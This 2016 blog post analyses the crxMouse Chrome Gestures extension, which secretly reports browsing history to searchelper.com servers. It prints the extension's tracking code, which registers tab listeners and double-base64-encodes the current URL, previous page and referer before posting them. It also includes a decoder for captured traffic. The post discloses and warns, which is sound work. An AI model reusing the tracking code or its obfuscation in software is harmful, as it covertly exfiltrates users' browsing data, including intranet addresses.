
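Beware of browser extensions stealing your privacy

Author: Anonymous  Published: 2016-08-02 21:13:28

   Browser extensions have become a must-have for browsers, but the extensions on the market vary widely in quality, and some even steal user privacy, such as the browser's history. I ran into just such an extension: the well-known gesture extension crxMouse Chrome Gestures. What is even more infuriating is that I had already been using it for more than a year.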

1 Brief introduction:

   Searching Google for crxMouse Chrome Gestures leads to the Google store, where you can see a brief description of this extension.

   Original name: Gestures for Chrome(TM), Chinese localized edition. Convenient and fast, making full use of every mouse operation. Features include: mouse gestures, super drag, wheel gestures, rocker gestures, smooth scrolling, tab list, and more. This extension is dedicated to performing functions with the mouse, making full use of every mouse operation.

   Features include: mouse gestures, super drag, wheel gestures, rocker gestures, smooth scrolling, tab list, and more.

   The extension currently has 300,000 users on the Google store and 5,000 cumulative reviews. A large share of them are users in China, so the impact is quite broad.

   [Figure: Google store listing]

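2 Verifying the data theft

   A Wireshark capture shows two requests, sent to s808.searchelper.com and s1808.searchelper.com respectively. Here is the screenshot:

   [Figure: request to the s808 server]

   The Origin header shows that the request comes from a browser extension, identified as jgiplclhploodgnkcljjgddajfbmafmp. The extension with that ID can be found on Chrome's chrome://extensions/ page, where it is listed, and its directory on disk is: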

   

C:\Users\[user]\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgiplclhploodgnkcljjgddajfbmafmp

   

   We can find out how it works by analyzing its code, which is covered later. Attentive readers may notice that the body of the POST request looks encrypted. Its structure resembles base64; decoding it as base64 yields another base64-encoded string, and decoding once more gives the following data:

s=808&md=21&pid=SjOa3PgqWSHYapU&sess=314039255259558500&q=http://bbs.pediy.com/showthread.php?t=179524&prev=http://bbs.pediy.com/forumdisplay.php?f=161&link=1&sub=chrome&hreferer=http://bbs.pediy.com/forumdisplay.php?f=161&tmv=3015

   

   s=808 identifies the server s808; pid is the userid; sess is a session marker generated locally for the user; sub is the browser type; q is the current page; prev is the page the user came from, which serves the same purpose as the referer; and hreferer also records the referer field. With this data, user behavior can be analyzed and supplied to search engines. Baidu Analytics and Google Analytics in fact do the same kind of thing, and Baidu Analytics even collects statistics such as clicks. In this way your browsing behavior is sent to someone else's servers. That is not the most dangerous part: the most dangerous part is that pages you browse on an internal network are sent out as well, so internal sites can easily be exposed.

   Next, let's look at the other request, which is sent to the s1808 server. The request is as follows:

   [Figure: request to the s1808 server]

   After decoding, the content is essentially the same as the request sent to s808:

   

s=1808&md=21&pid=SjOa3PgqWSHYapU&sess=765877789119258500&sub=chrome&q=http%3A//bbs.pediy.com/showthread.php%3Ft%3D179524&hreferer=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%3D161&prev=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%3D161&tmv=4015&tmf=1

   

   It is not clear why this second, backup-like request is sent. Is it merely a backup? That remains an open question. To find out whether the extension has any other dangerous behavior, we analyze its implementation next.

3 Implementation of the malicious extension

   The extension's malicious behavior is concentrated in upalytics_ch.js. The initialization code that runs after installation:

   

this.initOnceAfterInstall = function() {
    // Generate a persistent per-install user ID (sent later as "pid").
    if (!utils.db.get("userid")) {
        var id = utils.createUserID();
        utils.db.set("userid", id);
    }
    // Record the installation time, in seconds.
    if (!utils.db.get("install_time")) {
        var now = (new Date).getTime() / 1E3;
        utils.db.set("install_time", now);
    }
    // Store the tmv constant.
    if (!utils.db_type.get("tmv")) {
        var now = (new Date).getTime() / 1E3;
        utils.db_type.set("tmv", SIM_ModuleConstants._TMV);
    }
};

   

   During initialization it generates the userid, records install_time, and stores these together with the tmv field in the local localStorage. It then calls the addListener interfaces to register listeners, so that whenever a tab is updated, replaced, or activated, the corresponding function is called to send the corresponding request. extension_onRequest sends to the s808 server, while tabs_onUpdated, tabs_onActivated, and tabs_onReplaced send requests to the s1808 server. The code is as follows:

   

this.start = function() {
    try {
        // Messages from the extension's own pages: reported to s808.
        chrome.extension.onRequest.addListener(extension_onRequest);
        // Tab update, activation and replacement events: reported to s1808.
        chrome.tabs.onUpdated.addListener(tabs_onUpdated);
        chrome.tabs.onActivated.addListener(tabs_onActivated);
        chrome.tabs.onReplaced.addListener(tabs_onReplaced);
    } catch (e) {
        log.SEVERE("8835", e);
    }
};

 

   

   Below is a brief analysis of the code that sends the related request to s808.searchelper.com. It has been simplified; the parts left out are mainly the handling that drops some Google search redirects, pages whose docType is not html, and events that occur at very short intervals.


// Simplified excerpt: tabId, tab_url, res_prev_url, change_status, ref and
// last_prev are not defined in the lines shown here.
function extension_onRequest(request, sender, sendResponse) {
    var prev_state = tabs_states[tabId];
    tabs_states[tabId] = change_status;
    if (res_prev_url == tab_url && prev_state != change_status) {
        log.ERROR("ERROR 8002 ??");
        return;
    }
    if (res_prev_url == null || res_prev_url.length == 0) {
        res_prev_url = last_prev;
    }
    last_prev = tab_url;
    // Build the tracking record: server id, user id, session, current URL (q),
    // previous URL (prev) and referer (hreferer).
    var data = "s=" + SIM_Config_BG.getSourceId() + "&md=21&pid=" + utils.db.get("userid") + "&sess=" + SIM_Session.getSessionId() + "&q=" + encodeURIComponent(tab_url) + "&prev=" + encodeURIComponent(res_prev_url) + "&link=" + (ref ? "1" : "0") + "&sub=" + SIM_ModuleConstants.BROWSER + "&hreferer=" + encodeURIComponent(ref);
    data = data + "&tmv=" + SIM_ModuleConstants._TMV;
    // Base64-encode the record twice and send it as the form field "e".
    data = SIM_Base64.encode(SIM_Base64.encode(data));
    data = "e=" + data;
    var url = utils.db_type.get("server") + "/related";

    utils.net.post(url, "json", data, function(result) {
        log.INFO("Succeeded in posting data");
        tabs_prevs[tabId] = tab_url;
    }, function(httpCode) {
        log.INFO("Failed to retrieve content. (HTTP Code:" + httpCode.status + ")");
        log.ERROR("ERROR 8004 ??");
        tabs_prevs[tabId] = tab_url;
    });
}


   The code above shows that the key data, the browser's current URL and the referer, is base64-encoded twice, which is enough to escape the notice of ordinary users. Could this approach also slip past some of Google's automated review? I am rather curious.
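
   The double base64 encoding and the field meanings described above are enough to build a small analysis aid for captured traffic. The following Node.js code is an added example, not code from the extension or from the original article; it assumes SIM_Base64 is standard base64, and the function names, the sample values and the internal-host heuristic are hypothetical.

```javascript
// Added example, not the extension's code. Assumes SIM_Base64 is standard base64.
const PRIVATE_V4 = /^(10\.|127\.|192\.168\.|169\.254\.|172\.(1[6-9]|2\d|3[01])\.)/;

// Heuristic: private IPv4 ranges, single-label names, or common internal suffixes.
function isInternalHost(host) {
  if (/^\d+(\.\d+){3}$/.test(host)) return PRIVATE_V4.test(host);
  return !host.includes(".") || /\.(local|lan|internal|corp)$/i.test(host);
}

const b64decode = (t) => Buffer.from(t, "base64").toString("utf8");
const b64encode = (t) => Buffer.from(t, "utf8").toString("base64");

// body: raw POST body of the form "e=<base64(base64(query string))>".
function decodeTrackingBody(body) {
  const m = /^e=(.+)$/.exec(body.trim());
  if (!m) throw new Error("not an e= tracking body");
  // The value is appended without URL-encoding, so '+' must stay literal;
  // only undo percent-encoding that a capture tool may have applied.
  const inner = b64decode(b64decode(decodeURIComponent(m[1])));
  const fields = Object.fromEntries(new URLSearchParams(inner));
  const leaked = ["q", "prev", "hreferer"].filter((k) => fields[k]).map((k) => {
    let host = "";
    try { host = new URL(fields[k]).hostname; } catch (_) { /* not a URL */ }
    return { field: k, url: fields[k], host, internal: host !== "" && isInternalHost(host) };
  });
  return { fields, leaked };
}

// Constructed sample: same field layout as the page's requests, made-up values.
function buildSample() {
  const page = "http://wiki.corp/payroll?id=7";   // hypothetical intranet page
  const from = "http://10.0.3.15/login";          // hypothetical previous page
  const data = "s=808&md=21&pid=EXAMPLEUSERID&sess=1234567890" +
    "&q=" + encodeURIComponent(page) + "&prev=" + encodeURIComponent(from) +
    "&link=1&sub=chrome&hreferer=" + encodeURIComponent(from) + "&tmv=3015";
  return "e=" + b64encode(b64encode(data));
}

const report = decodeTrackingBody(buildSample());
for (const item of report.leaked) {
  console.log(item.field, item.url, item.internal ? "INTERNAL" : "external");
}
```

   Run over POST bodies exported from a proxy or packet capture, the `internal` flag shows directly which intranet addresses have left the network.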

4 Recommendations

   Developers do not have it easy: a program written with great effort earns no money, so the only way to get a return is to steal users' browsing history and send it to third parties, presumably out of necessity. Even so, this kind of privacy theft must be firmly rejected. Mouse gestures are such a handy feature that I can no longer do without them, so I chose a different gesture extension from the Google store. With this lesson learned, I trust everyone will keep a closer eye on the browser extensions they use in the future.

 
